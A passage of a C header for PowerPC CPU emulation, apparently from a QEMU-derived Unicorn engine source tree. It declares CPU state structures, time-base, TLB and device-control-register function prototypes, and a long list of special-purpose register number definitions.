    int nb_ways;     /* Number of ways in the TLB set */
    int last_way;    /* Last used way used to allocate TLB in a LRU way */
    int id_tlbs;     /* If 1, MMU has separated TLBs for instructions & data */
    int nb_pids;     /* Number of available PID registers */
    int tlb_type;    /* Type of TLB we're dealing with */
    ppc_tlb_t tlb;   /* TLB is optional. Allocate them only if needed */
    target_ulong pb[4]; /* 403 dedicated access protection registers */
    bool tlb_dirty;     /* Set to non-zero when modifying TLB */
    bool kvm_sw_tlb;    /* non-zero if KVM SW TLB API is active */
    uint32_t tlb_need_flush; /* Delayed flush needed */
#define TLB_NEED_LOCAL_FLUSH 0x1
#define TLB_NEED_GLOBAL_FLUSH 0x2

    /* Other registers */
    target_ulong spr[1024]; /* special purpose registers */
    ppc_spr_t spr_cb[1024];
    /* Vector status and control register, minus VSCR_SAT */
    uint32_t vscr;
    /* VSX registers (including FP and AVR) */
    ppc_vsr_t vsr[64] QEMU_ALIGNED(16);
    /* Non-zero if and only if VSCR_SAT should be set */
    ppc_vsr_t vscr_sat QEMU_ALIGNED(16);
    /* SPE registers */
    uint64_t spe_acc;
    uint32_t spe_fscr;
    /* SPE and Altivec share status as they'll never be used simultaneously */
    float_status vec_status;
    float_status fp_status; /* Floating point execution context */
    target_ulong fpscr;     /* Floating point status and control register */

    /* Internal devices resources */
    ppc_tb_t *tb_env;   /* Time base and decrementer */
    ppc_dcr_t *dcr_env; /* Device control registers */
    int dcache_line_size;
    int icache_line_size;

    /* These resources are used during exception processing */
    /* CPU model definition */
    target_ulong msr_mask;
    powerpc_mmu_t mmu_model;
    powerpc_excp_t excp_model;
    powerpc_input_t bus_model;
    int bfd_mach;
    uint32_t flags;
    uint64_t insns_flags;
    uint64_t insns_flags2;

    int error_code;
    uint32_t pending_interrupts;
    /*
     * This is the IRQ controller, which is implementation dependent and only
     * relevant when emulating a complete machine. Note that this isn't used
     * by recent Book3s compatible CPUs (POWER7 and newer).
     */
    uint32_t irq_input_state;
    void **irq_inputs;

    target_ulong excp_vectors[POWERPC_EXCP_NB]; /* Exception vectors */
    target_ulong excp_prefix;
    target_ulong ivor_mask;
    target_ulong ivpr_mask;
    target_ulong hreset_vector;
    hwaddr mpic_iack;
    bool mpic_proxy;  /* true if the external proxy facility mode is enabled */
    bool has_hv_mode; /* set when the processor has an HV mode, thus HV priv */
                      /* instructions and SPRs are disallowed if MSR:HV is 0 */
    /*
     * On P7/P8/P9, set when in PM state so we need to handle resume in a
     * special way (such as routing some resume causes to 0x100, i.e. sreset).
     */
    bool resume_as_sreset;

    /* These resources are used only in QEMU core */
    target_ulong hflags;      /* hflags is MSR & HFLAGS_MASK */
    target_ulong hflags_nmsr; /* specific hflags, not coming from MSR */
    int immu_idx; /* precomputed MMU index to speed up insn accesses */
    int dmmu_idx; /* precomputed MMU index to speed up data accesses */

    /* Power management */
    int (*check_pow)(CPUPPCState *env);

    void *load_info; /* holds boot loading state */

    /* booke timers */
    /*
     * Specifies bit locations of the Time Base used to signal a fixed timer
     * exception on a transition from 0 to 1 (watchdog or fixed-interval timer)
     *
     * 0 selects the least significant bit, 63 selects the most significant bit
     */
    uint8_t fit_period[4];
    uint8_t wdt_period[4];

    /* Transactional memory state */
    target_ulong tm_gpr[32];
    ppc_avr_t tm_vsr[64];
    uint64_t tm_cr;
    uint64_t tm_lr;
    uint64_t tm_ctr;
    uint64_t tm_fpscr;
    uint64_t tm_amr;
    uint64_t tm_ppr;
    uint64_t tm_vrsave;
    uint32_t tm_vscr;
    uint64_t tm_dscr;
    uint64_t tm_tar;

    /* Unicorn engine */
    struct uc_struct *uc;
};

#define SET_FIT_PERIOD(a_, b_, c_, d_)  \
    do {                                \
        env->fit_period[0] = (a_);      \
        env->fit_period[1] = (b_);      \
        env->fit_period[2] = (c_);      \
        env->fit_period[3] = (d_);      \
    } while (0)

#define SET_WDT_PERIOD(a_, b_, c_, d_)  \
    do {                                \
        env->wdt_period[0] = (a_);      \
        env->wdt_period[1] = (b_);      \
        env->wdt_period[2] = (c_);      \
        env->wdt_period[3] = (d_);      \
    } while (0)

#if 0
typedef struct PPCVirtualHypervisor PPCVirtualHypervisor;
typedef struct PPCVirtualHypervisorClass PPCVirtualHypervisorClass;
#endif

/**
 * PowerPCCPU:
 * @env: #CPUPPCState
 * @vcpu_id: vCPU identifier given to KVM
 * @compat_pvr: Current logical PVR, zero if in "raw" mode
 *
 * A PowerPC CPU.
 */
struct PowerPCCPU {
    /*< private >*/
    CPUState parent_obj;
    /*< public >*/

    CPUNegativeOffsetState neg;
    CPUPPCState env;

    int vcpu_id;
    uint32_t compat_pvr;
#if 0
    PPCVirtualHypervisor *vhyp;
#endif
    void *machine_data;
    int32_t node_id; /* NUMA node this CPU belongs to */
    PPCHash64Options *hash64_opts;

    /* Those resources are used only during code translation */
    /* opcode handlers */
    opc_handler_t *opcodes[PPC_CPU_OPCODES_LEN];

    /* Fields related to migration compatibility hacks */
    bool pre_2_8_migration;
    target_ulong mig_msr_mask;
    uint64_t mig_insns_flags;
    uint64_t mig_insns_flags2;
    uint32_t mig_nb_BATs;
    bool pre_2_10_migration;
    bool pre_3_0_migration;
    int32_t mig_slb_nr;

    struct PowerPCCPUClass cc;
};

PowerPCCPUClass *ppc_cpu_class_by_pvr(uint32_t pvr);
PowerPCCPUClass *ppc_cpu_class_by_pvr_mask(uint32_t pvr);
PowerPCCPUClass *ppc_cpu_get_family_class(PowerPCCPUClass *pcc);

#if 0
struct PPCVirtualHypervisorClass {
    InterfaceClass parent;
    void (*hypercall)(PPCVirtualHypervisor *vhyp, PowerPCCPU *cpu);
    hwaddr (*hpt_mask)(PPCVirtualHypervisor *vhyp);
    const ppc_hash_pte64_t *(*map_hptes)(PPCVirtualHypervisor *vhyp,
                                         hwaddr ptex, int n);
    void (*unmap_hptes)(PPCVirtualHypervisor *vhyp,
                        const ppc_hash_pte64_t *hptes,
                        hwaddr ptex, int n);
    void (*hpte_set_c)(PPCVirtualHypervisor *vhyp, hwaddr ptex, uint64_t pte1);
    void (*hpte_set_r)(PPCVirtualHypervisor *vhyp, hwaddr ptex, uint64_t pte1);
    void (*get_pate)(PPCVirtualHypervisor *vhyp, ppc_v3_pate_t *entry);
    target_ulong (*encode_hpt_for_kvm_pr)(PPCVirtualHypervisor *vhyp);
    void (*cpu_exec_enter)(PPCVirtualHypervisor *vhyp, PowerPCCPU *cpu);
    void (*cpu_exec_exit)(PPCVirtualHypervisor *vhyp, PowerPCCPU *cpu);
};

#define TYPE_PPC_VIRTUAL_HYPERVISOR "ppc-virtual-hypervisor"
#define PPC_VIRTUAL_HYPERVISOR(obj) \
    OBJECT_CHECK(PPCVirtualHypervisor, (obj), TYPE_PPC_VIRTUAL_HYPERVISOR)
#define PPC_VIRTUAL_HYPERVISOR_CLASS(klass) \
    OBJECT_CLASS_CHECK(PPCVirtualHypervisorClass, (klass), \
                       TYPE_PPC_VIRTUAL_HYPERVISOR)
#define PPC_VIRTUAL_HYPERVISOR_GET_CLASS(obj) \
    OBJECT_GET_CLASS(PPCVirtualHypervisorClass, (obj), \
                     TYPE_PPC_VIRTUAL_HYPERVISOR)
#endif

void ppc_cpu_do_interrupt(CPUState *cpu);
bool ppc_cpu_exec_interrupt(CPUState *cpu, int int_req);
hwaddr ppc_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr);
void ppc_cpu_do_system_reset(CPUState *cs, target_ulong vector);
void ppc_cpu_do_fwnmi_machine_check(CPUState *cs, target_ulong vector);
#if 0
extern const VMStateDescription vmstate_ppc_cpu;
#endif

/*****************************************************************************/
void ppc_translate_init(struct uc_struct *uc);

/*
 * you can call this signal handler from your SIGBUS and SIGSEGV
 * signal handlers to inform the virtual CPU of exceptions. non zero
 * is returned if the signal was handled by the virtual CPU.
*/ int cpu_ppc_signal_handler(int host_signum, void *pinfo, void *puc); bool ppc_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void ppc_store_sdr1(CPUPPCState *env, target_ulong value); void ppc_store_ptcr(CPUPPCState *env, target_ulong value); void ppc_store_msr(CPUPPCState *env, target_ulong value); void ppc_cpu_list(void); /* Time-base and decrementer management */ #ifndef NO_CPU_IO_DEFS uint64_t cpu_ppc_load_tbl(CPUPPCState *env); uint32_t cpu_ppc_load_tbu(CPUPPCState *env); void cpu_ppc_store_tbu(CPUPPCState *env, uint32_t value); void cpu_ppc_store_tbl(CPUPPCState *env, uint32_t value); uint64_t cpu_ppc_load_atbl(CPUPPCState *env); uint32_t cpu_ppc_load_atbu(CPUPPCState *env); void cpu_ppc_store_atbl(CPUPPCState *env, uint32_t value); void cpu_ppc_store_atbu(CPUPPCState *env, uint32_t value); uint64_t cpu_ppc_load_vtb(CPUPPCState *env); void cpu_ppc_store_vtb(CPUPPCState *env, uint64_t value); bool ppc_decr_clear_on_delivery(CPUPPCState *env); target_ulong cpu_ppc_load_decr(CPUPPCState *env); void cpu_ppc_store_decr(CPUPPCState *env, target_ulong value); target_ulong cpu_ppc_load_hdecr(CPUPPCState *env); void cpu_ppc_store_hdecr(CPUPPCState *env, target_ulong value); void cpu_ppc_store_tbu40(CPUPPCState *env, uint64_t value); uint64_t cpu_ppc_load_purr(CPUPPCState *env); void cpu_ppc_store_purr(CPUPPCState *env, uint64_t value); uint32_t cpu_ppc601_load_rtcl(CPUPPCState *env); uint32_t cpu_ppc601_load_rtcu(CPUPPCState *env); void cpu_ppc601_store_rtcl(CPUPPCState *env, uint32_t value); void cpu_ppc601_store_rtcu(CPUPPCState *env, uint32_t value); target_ulong load_40x_pit(CPUPPCState *env); void store_40x_pit(CPUPPCState *env, target_ulong val); void store_40x_dbcr0(CPUPPCState *env, uint32_t val); void store_40x_sler(CPUPPCState *env, uint32_t val); void store_booke_tcr(CPUPPCState *env, target_ulong val); void store_booke_tsr(CPUPPCState *env, target_ulong val); void ppc_tlb_invalidate_all(CPUPPCState *env); void ppc_tlb_invalidate_one(CPUPPCState *env, target_ulong addr); #if 0 void cpu_ppc_set_vhyp(PowerPCCPU *cpu, PPCVirtualHypervisor *vhyp); #endif #endif void store_fpscr(CPUPPCState *env, uint64_t arg, uint32_t mask); void helper_hfscr_facility_check(CPUPPCState *env, uint32_t bit, const char *caller, uint32_t cause); static inline uint64_t ppc_dump_gpr(CPUPPCState *env, int gprn) { uint64_t gprv; gprv = env->gpr[gprn]; if (env->flags & POWERPC_FLAG_SPE) { /* * If the CPU implements the SPE extension, we have to get the * high bits of the GPR from the gprh storage area */ gprv &= 0xFFFFFFFFULL; gprv |= (uint64_t)env->gprh[gprn] << 32; } return gprv; } /* Device control registers */ int ppc_dcr_read(ppc_dcr_t *dcr_env, int dcrn, uint32_t *valp); int ppc_dcr_write(ppc_dcr_t *dcr_env, int dcrn, uint32_t val); #define POWERPC_CPU_TYPE_SUFFIX "-" TYPE_POWERPC_CPU #define POWERPC_CPU_TYPE_NAME(model) model POWERPC_CPU_TYPE_SUFFIX #define CPU_RESOLVING_TYPE TYPE_POWERPC_CPU #define cpu_signal_handler cpu_ppc_signal_handler #define cpu_list ppc_cpu_list /* MMU modes definitions */ #define MMU_USER_IDX 0 static inline int cpu_mmu_index(CPUPPCState *env, bool ifetch) { return ifetch ? 
env->immu_idx : env->dmmu_idx; } /* Compatibility modes */ #if defined(TARGET_PPC64) bool ppc_check_compat(PowerPCCPU *cpu, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr); bool ppc_type_check_compat(const char *cputype, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr); void ppc_set_compat(PowerPCCPU *cpu, uint32_t compat_pvr); void ppc_set_compat_all(uint32_t compat_pvr); int ppc_compat_max_vthreads(PowerPCCPU *cpu); #if 0 void ppc_compat_add_property(Object *obj, const char *name, uint32_t *compat_pvr, const char *basedesc); #endif #endif /* defined(TARGET_PPC64) */ typedef CPUPPCState CPUArchState; typedef PowerPCCPU ArchCPU; #include "exec/cpu-all.h" /*****************************************************************************/ /* CRF definitions */ #define CRF_LT_BIT 3 #define CRF_GT_BIT 2 #define CRF_EQ_BIT 1 #define CRF_SO_BIT 0 #define CRF_LT (1 << CRF_LT_BIT) #define CRF_GT (1 << CRF_GT_BIT) #define CRF_EQ (1 << CRF_EQ_BIT) #define CRF_SO (1 << CRF_SO_BIT) /* For SPE extensions */ #define CRF_CH (1 << CRF_LT_BIT) #define CRF_CL (1 << CRF_GT_BIT) #define CRF_CH_OR_CL (1 << CRF_EQ_BIT) #define CRF_CH_AND_CL (1 << CRF_SO_BIT) /* XER definitions */ #define XER_SO 31 #define XER_OV 30 #define XER_CA 29 #define XER_OV32 19 #define XER_CA32 18 #define XER_CMP 8 #define XER_BC 0 #define xer_so (env->so) #define xer_ov (env->ov) #define xer_ca (env->ca) #define xer_ov32 (env->ov) #define xer_ca32 (env->ca) #define xer_cmp ((env->xer >> XER_CMP) & 0xFF) #define xer_bc ((env->xer >> XER_BC) & 0x7F) /* SPR definitions */ #define SPR_MQ (0x000) #define SPR_XER (0x001) #define SPR_601_VRTCU (0x004) #define SPR_601_VRTCL (0x005) #define SPR_601_UDECR (0x006) #define SPR_LR (0x008) #define SPR_CTR (0x009) #define SPR_UAMR (0x00D) #define SPR_DSCR (0x011) #define SPR_DSISR (0x012) #define SPR_DAR (0x013) /* DAE for PowerPC 601 */ #define SPR_601_RTCU (0x014) #define SPR_601_RTCL (0x015) #define SPR_DECR (0x016) #define SPR_SDR1 (0x019) #define SPR_SRR0 (0x01A) #define SPR_SRR1 (0x01B) #define SPR_CFAR (0x01C) #define SPR_AMR (0x01D) #define SPR_ACOP (0x01F) #define SPR_BOOKE_PID (0x030) #define SPR_BOOKS_PID (0x030) #define SPR_BOOKE_DECAR (0x036) #define SPR_BOOKE_CSRR0 (0x03A) #define SPR_BOOKE_CSRR1 (0x03B) #define SPR_BOOKE_DEAR (0x03D) #define SPR_IAMR (0x03D) #define SPR_BOOKE_ESR (0x03E) #define SPR_BOOKE_IVPR (0x03F) #define SPR_MPC_EIE (0x050) #define SPR_MPC_EID (0x051) #define SPR_MPC_NRI (0x052) #define SPR_TFHAR (0x080) #define SPR_TFIAR (0x081) #define SPR_TEXASR (0x082) #define SPR_TEXASRU (0x083) #define SPR_UCTRL (0x088) #define SPR_TIDR (0x090) #define SPR_MPC_CMPA (0x090) #define SPR_MPC_CMPB (0x091) #define SPR_MPC_CMPC (0x092) #define SPR_MPC_CMPD (0x093) #define SPR_MPC_ECR (0x094) #define SPR_MPC_DER (0x095) #define SPR_MPC_COUNTA (0x096) #define SPR_MPC_COUNTB (0x097) #define SPR_CTRL (0x098) #define SPR_MPC_CMPE (0x098) #define SPR_MPC_CMPF (0x099) #define SPR_FSCR (0x099) #define SPR_MPC_CMPG (0x09A) #define SPR_MPC_CMPH (0x09B) #define SPR_MPC_LCTRL1 (0x09C) #define SPR_MPC_LCTRL2 (0x09D) #define SPR_UAMOR (0x09D) #define SPR_MPC_ICTRL (0x09E) #define SPR_MPC_BAR (0x09F) #define SPR_PSPB (0x09F) #define SPR_DPDES (0x0B0) #define SPR_DAWR (0x0B4) #define SPR_RPR (0x0BA) #define SPR_CIABR (0x0BB) #define SPR_DAWRX (0x0BC) #define SPR_HFSCR (0x0BE) #define SPR_VRSAVE (0x100) #define SPR_USPRG0 (0x100) #define SPR_USPRG1 (0x101) #define SPR_USPRG2 (0x102) #define SPR_USPRG3 (0x103) #define SPR_USPRG4 (0x104) #define SPR_USPRG5 
(0x105) #define SPR_USPRG6 (0x106) #define SPR_USPRG7 (0x107) #define SPR_VTBL (0x10C) #define SPR_VTBU (0x10D) #define SPR_SPRG0 (0x110) #define SPR_SPRG1 (0x111) #define SPR_SPRG2 (0x112) #define SPR_SPRG3 (0x113) #define SPR_SPRG4 (0x114) #define SPR_SCOMC (0x114) #define SPR_SPRG5 (0x115) #define SPR_SCOMD (0x115) #define SPR_SPRG6 (0x116) #define SPR_SPRG7 (0x117) #define SPR_ASR (0x118) #define SPR_EAR (0x11A) #define SPR_TBL (0x11C) #define SPR_TBU (0x11D) #define SPR_TBU40 (0x11E) #define SPR_SVR (0x11E) #define SPR_BOOKE_PIR (0x11E) #define SPR_PVR (0x11F) #define SPR_HSPRG0 (0x130) #define SPR_BOOKE_DBSR (0x130) #define SPR_HSPRG1 (0x131) #define SPR_HDSISR (0x132) #define SPR_HDAR (0x133) #define SPR_BOOKE_EPCR (0x133) #define SPR_SPURR (0x134) #define SPR_BOOKE_DBCR0 (0x134) #define SPR_IBCR (0x135) #define SPR_PURR (0x135) #define SPR_BOOKE_DBCR1 (0x135) #define SPR_DBCR (0x136) #define SPR_HDEC (0x136) #define SPR_BOOKE_DBCR2 (0x136) #define SPR_HIOR (0x137) #define SPR_MBAR (0x137) #define SPR_RMOR (0x138) #define SPR_BOOKE_IAC1 (0x138) #define SPR_HRMOR (0x139) #define SPR_BOOKE_IAC2 (0x139) #define SPR_HSRR0 (0x13A) #define SPR_BOOKE_IAC3 (0x13A) #define SPR_HSRR1 (0x13B) #define SPR_BOOKE_IAC4 (0x13B) #define SPR_BOOKE_DAC1 (0x13C) #define SPR_MMCRH (0x13C) #define SPR_DABR2 (0x13D) #define SPR_BOOKE_DAC2 (0x13D) #define SPR_TFMR (0x13D) #define SPR_BOOKE_DVC1 (0x13E) #define SPR_LPCR (0x13E) #define SPR_BOOKE_DVC2 (0x13F) #define SPR_LPIDR (0x13F) #define SPR_BOOKE_TSR (0x150) #define SPR_HMER (0x150) #define SPR_HMEER (0x151) #define SPR_PCR (0x152) #define SPR_BOOKE_LPIDR (0x152) #define SPR_BOOKE_TCR (0x154) #define SPR_BOOKE_TLB0PS (0x158) #define SPR_BOOKE_TLB1PS (0x159) #define SPR_BOOKE_TLB2PS (0x15A) #define SPR_BOOKE_TLB3PS (0x15B) #define SPR_AMOR (0x15D) #define SPR_BOOKE_MAS7_MAS3 (0x174) #define SPR_BOOKE_IVOR0 (0x190) #define SPR_BOOKE_IVOR1 (0x191) #define SPR_BOOKE_IVOR2 (0x192) #define SPR_BOOKE_IVOR3 (0x193) #define SPR_BOOKE_IVOR4 (0x194) #define SPR_BOOKE_IVOR5 (0x195) #define SPR_BOOKE_IVOR6 (0x196) #define SPR_BOOKE_IVOR7 (0x197) #define SPR_BOOKE_IVOR8 (0x198) #define SPR_BOOKE_IVOR9 (0x199) #define SPR_BOOKE_IVOR10 (0x19A) #define SPR_BOOKE_IVOR11 (0x19B) #define SPR_BOOKE_IVOR12 (0x19C) #define SPR_BOOKE_IVOR13 (0x19D) #define SPR_BOOKE_IVOR14 (0x19E) #define SPR_BOOKE_IVOR15 (0x19F) #define SPR_BOOKE_IVOR38 (0x1B0) #define SPR_BOOKE_IVOR39 (0x1B1) #define SPR_BOOKE_IVOR40 (0x1B2) #define SPR_BOOKE_IVOR41 (0x1B3) #define SPR_BOOKE_IVOR42 (0x1B4) #define SPR_BOOKE_GIVOR2 (0x1B8) #define SPR_BOOKE_GIVOR3 (0x1B9) #define SPR_BOOKE_GIVOR4 (0x1BA) #define SPR_BOOKE_GIVOR8 (0x1BB) #define SPR_BOOKE_GIVOR13 (0x1BC) #define SPR_BOOKE_GIVOR14 (0x1BD) #define SPR_TIR (0x1BE) #define SPR_PTCR (0x1D0) #define SPR_BOOKE_SPEFSCR (0x200) #define SPR_Exxx_BBEAR (0x201) #define SPR_Exxx_BBTAR (0x202) #define SPR_Exxx_L1CFG0 (0x203) #define SPR_Exxx_L1CFG1 (0x204) #define SPR_Exxx_NPIDR (0x205) #define SPR_ATBL (0x20E) #define SPR_ATBU (0x20F) #define SPR_IBAT0U (0x210) #define SPR_BOOKE_IVOR32 (0x210) #define SPR_RCPU_MI_GRA (0x210) #define SPR_IBAT0L (0x211) #define SPR_BOOKE_IVOR33 (0x211) #define SPR_IBAT1U (0x212) #define SPR_BOOKE_IVOR34 (0x212) #define SPR_IBAT1L (0x213) #define SPR_BOOKE_IVOR35 (0x213) #define SPR_IBAT2U (0x214) #define SPR_BOOKE_IVOR36 (0x214) #define SPR_IBAT2L (0x215) #define SPR_BOOKE_IVOR37 (0x215) #define SPR_IBAT3U (0x216) #define SPR_IBAT3L (0x217) #define SPR_DBAT0U (0x218) #define SPR_RCPU_L2U_GRA (0x218) #define SPR_DBAT0L 
(0x219) #define SPR_DBAT1U (0x21A) #define SPR_DBAT1L (0x21B) #define SPR_DBAT2U (0x21C) #define SPR_DBAT2L (0x21D) #define SPR_DBAT3U (0x21E) #define SPR_DBAT3L (0x21F) #define SPR_IBAT4U (0x230) #define SPR_RPCU_BBCMCR (0x230) #define SPR_MPC_IC_CST (0x230) #define SPR_Exxx_CTXCR (0x230) #define SPR_IBAT4L (0x231) #define SPR_MPC_IC_ADR (0x231) #define SPR_Exxx_DBCR3 (0x231) #define SPR_IBAT5U (0x232) #define SPR_MPC_IC_DAT (0x232) #define SPR_Exxx_DBCNT (0x232) #define SPR_IBAT5L (0x233) #define SPR_IBAT6U (0x234) #define SPR_IBAT6L (0x235) #define SPR_IBAT7U (0x236) #define SPR_IBAT7L (0x237) #define SPR_DBAT4U (0x238) #define SPR_RCPU_L2U_MCR (0x238) #define SPR_MPC_DC_CST (0x238) #define SPR_Exxx_ALTCTXCR (0x238) #define SPR_DBAT4L (0x239) #define SPR_MPC_DC_ADR (0x239) #define SPR_DBAT5U (0x23A) #define SPR_BOOKE_MCSRR0 (0x23A) #define SPR_MPC_DC_DAT (0x23A) #define SPR_DBAT5L (0x23B) #define SPR_BOOKE_MCSRR1 (0x23B) #define SPR_DBAT6U (0x23C) #define SPR_BOOKE_MCSR (0x23C) #define SPR_DBAT6L (0x23D) #define SPR_Exxx_MCAR (0x23D) #define SPR_DBAT7U (0x23E) #define SPR_BOOKE_DSRR0 (0x23E) #define SPR_DBAT7L (0x23F) #define SPR_BOOKE_DSRR1 (0x23F) #define SPR_BOOKE_SPRG8 (0x25C) #define SPR_BOOKE_SPRG9 (0x25D) #define SPR_BOOKE_MAS0 (0x270) #define SPR_BOOKE_MAS1 (0x271) #define SPR_BOOKE_MAS2 (0x272) #define SPR_BOOKE_MAS3 (0x273) #define SPR_BOOKE_MAS4 (0x274) #define SPR_BOOKE_MAS5 (0x275) #define SPR_BOOKE_MAS6 (0x276) #define SPR_BOOKE_PID1 (0x279) #define SPR_BOOKE_PID2 (0x27A) #define SPR_MPC_DPDR (0x280) #define SPR_MPC_IMMR (0x288) #define SPR_BOOKE_TLB0CFG (0x2B0) #define SPR_BOOKE_TLB1CFG (0x2B1) #define SPR_BOOKE_TLB2CFG (0x2B2) #define SPR_BOOKE_TLB3CFG (0x2B3) #define SPR_BOOKE_EPR (0x2BE) #define SPR_PERF0 (0x300) #define SPR_RCPU_MI_RBA0 (0x300) #define SPR_MPC_MI_CTR (0x300) #define SPR_POWER_USIER (0x300) #define SPR_PERF1 (0x301) #define SPR_RCPU_MI_RBA1 (0x301) #define SPR_POWER_UMMCR2 (0x301) #define SPR_PERF2 (0x302) #define SPR_RCPU_MI_RBA2 (0x302) #define SPR_MPC_MI_AP (0x302) #define SPR_POWER_UMMCRA (0x302) #define SPR_PERF3 (0x303) #define SPR_RCPU_MI_RBA3 (0x303) #define SPR_MPC_MI_EPN (0x303) #define SPR_POWER_UPMC1 (0x303) #define SPR_PERF4 (0x304) #define SPR_POWER_UPMC2 (0x304) #define SPR_PERF5 (0x305) #define SPR_MPC_MI_TWC (0x305) #define SPR_POWER_UPMC3 (0x305) #define SPR_PERF6 (0x306) #define SPR_MPC_MI_RPN (0x306) #define SPR_POWER_UPMC4 (0x306) #define SPR_PERF7 (0x307) #define SPR_POWER_UPMC5 (0x307) #define SPR_PERF8 (0x308) #define SPR_RCPU_L2U_RBA0 (0x308) #define SPR_MPC_MD_CTR (0x308) #define SPR_POWER_UPMC6 (0x308) #define SPR_PERF9 (0x309) #define SPR_RCPU_L2U_RBA1 (0x309) #define SPR_MPC_MD_CASID (0x309) #define SPR_970_UPMC7 (0X309) #define SPR_PERFA (0x30A) #define SPR_RCPU_L2U_RBA2 (0x30A) #define SPR_MPC_MD_AP (0x30A) #define SPR_970_UPMC8 (0X30A) #define SPR_PERFB (0x30B) #define SPR_RCPU_L2U_RBA3 (0x30B) #define SPR_MPC_MD_EPN (0x30B) #define SPR_POWER_UMMCR0 (0X30B) #define SPR_PERFC (0x30C) #define SPR_MPC_MD_TWB (0x30C) #define SPR_POWER_USIAR (0X30C) #define SPR_PERFD (0x30D) #define SPR_MPC_MD_TWC (0x30D) #define SPR_POWER_USDAR (0X30D) #define SPR_PERFE (0x30E) #define SPR_MPC_MD_RPN (0x30E) #define SPR_POWER_UMMCR1 (0X30E) #define SPR_PERFF (0x30F) #define SPR_MPC_MD_TW (0x30F) #define SPR_UPERF0 (0x310) #define SPR_POWER_SIER (0x310) #define SPR_UPERF1 (0x311) #define SPR_POWER_MMCR2 (0x311) #define SPR_UPERF2 (0x312) #define SPR_POWER_MMCRA (0X312) #define SPR_UPERF3 (0x313) #define SPR_POWER_PMC1 (0X313) #define 
SPR_UPERF4 (0x314) #define SPR_POWER_PMC2 (0X314) #define SPR_UPERF5 (0x315) #define SPR_POWER_PMC3 (0X315) #define SPR_UPERF6 (0x316) #define SPR_POWER_PMC4 (0X316) #define SPR_UPERF7 (0x317) #define SPR_POWER_PMC5 (0X317) #define SPR_UPERF8 (0x318) #define SPR_POWER_PMC6 (0X318) #define SPR_UPERF9 (0x319) #define SPR_970_PMC7 (0X319) #define SPR_UPERFA (0x31A) #define SPR_970_PMC8 (0X31A) #define SPR_UPERFB (0x31B) #define SPR_POWER_MMCR0 (0X31B) #define SPR_UPERFC (0x31C) #define SPR_POWER_SIAR (0X31C) #define SPR_UPERFD (0x31D) #define SPR_POWER_SDAR (0X31D) #define SPR_UPERFE (0x31E) #define SPR_POWER_MMCR1 (0X31E) #define SPR_UPERFF (0x31F) #define SPR_RCPU_MI_RA0 (0x320) #define SPR_MPC_MI_DBCAM (0x320) #define SPR_BESCRS (0x320) #define SPR_RCPU_MI_RA1 (0x321) #define SPR_MPC_MI_DBRAM0 (0x321) #define SPR_BESCRSU (0x321) #define SPR_RCPU_MI_RA2 (0x322) #define SPR_MPC_MI_DBRAM1 (0x322) #define SPR_BESCRR (0x322) #define SPR_RCPU_MI_RA3 (0x323) #define SPR_BESCRRU (0x323) #define SPR_EBBHR (0x324) #define SPR_EBBRR (0x325) #define SPR_BESCR (0x326) #define SPR_RCPU_L2U_RA0 (0x328) #define SPR_MPC_MD_DBCAM (0x328) #define SPR_RCPU_L2U_RA1 (0x329) #define SPR_MPC_MD_DBRAM0 (0x329) #define SPR_RCPU_L2U_RA2 (0x32A) #define SPR_MPC_MD_DBRAM1 (0x32A) #define SPR_RCPU_L2U_RA3 (0x32B) #define SPR_TAR (0x32F) #define SPR_ASDR (0x330) #define SPR_IC (0x350) #define SPR_VTB (0x351) #define SPR_MMCRC (0x353) #define SPR_PSSCR (0x357) #define SPR_440_INV0 (0x370) #define SPR_440_INV1 (0x371) #define SPR_440_INV2 (0x372) #define SPR_440_INV3 (0x373) #define SPR_440_ITV0 (0x374) #define SPR_440_ITV1 (0x375) #define SPR_440_ITV2 (0x376) #define SPR_440_ITV3 (0x377) #define SPR_440_CCR1 (0x378) #define SPR_TACR (0x378) #define SPR_TCSCR (0x379) #define SPR_CSIGR (0x37a) #define SPR_DCRIPR (0x37B) #define SPR_POWER_SPMC1 (0x37C) #define SPR_POWER_SPMC2 (0x37D) #define SPR_POWER_MMCRS (0x37E) #define SPR_WORT (0x37F) #define SPR_PPR (0x380) #define SPR_750_GQR0 (0x390) #define SPR_440_DNV0 (0x390) #define SPR_750_GQR1 (0x391) #define SPR_440_DNV1 (0x391) #define SPR_750_GQR2 (0x392) #define SPR_440_DNV2 (0x392) #define SPR_750_GQR3 (0x393) #define SPR_440_DNV3 (0x393) #define SPR_750_GQR4 (0x394) #define SPR_440_DTV0 (0x394) #define SPR_750_GQR5 (0x395) #define SPR_440_DTV1 (0x395) #define SPR_750_GQR6 (0x396) #define SPR_440_DTV2 (0x396) #define SPR_750_GQR7 (0x397) #define SPR_440_DTV3 (0x397) #define SPR_750_THRM4 (0x398) #define SPR_750CL_HID2 (0x398) #define SPR_440_DVLIM (0x398) #define SPR_750_WPAR (0x399) #define SPR_440_IVLIM (0x399) #define SPR_TSCR (0x399) #define SPR_750_DMAU (0x39A) #define SPR_750_DMAL (0x39B) #define SPR_440_RSTCFG (0x39B) #define SPR_BOOKE_DCDBTRL (0x39C) #define SPR_BOOKE_DCDBTRH (0x39D) #define SPR_BOOKE_ICDBTRL (0x39E) #define SPR_BOOKE_ICDBTRH (0x39F) #define SPR_74XX_UMMCR2 (0x3A0) #define SPR_7XX_UPMC5 (0x3A1) #define SPR_7XX_UPMC6 (0x3A2) #define SPR_UBAMR (0x3A7) #define SPR_7XX_UMMCR0 (0x3A8) #define SPR_7XX_UPMC1 (0x3A9) #define SPR_7XX_UPMC2 (0x3AA) #define SPR_7XX_USIAR (0x3AB) #define SPR_7XX_UMMCR1 (0x3AC) #define SPR_7XX_UPMC3 (0x3AD) #define SPR_7XX_UPMC4 (0x3AE) #define SPR_USDA (0x3AF) #define SPR_40x_ZPR (0x3B0) #define SPR_BOOKE_MAS7 (0x3B0) #define SPR_74XX_MMCR2 (0x3B0) #define SPR_7XX_PMC5 (0x3B1) #define SPR_40x_PID (0x3B1) #define SPR_7XX_PMC6 (0x3B2) #define SPR_440_MMUCR (0x3B2) #define SPR_4xx_CCR0 (0x3B3) #define SPR_BOOKE_EPLC (0x3B3) #define SPR_405_IAC3 (0x3B4) #define SPR_BOOKE_EPSC (0x3B4) #define SPR_405_IAC4 (0x3B5) #define 
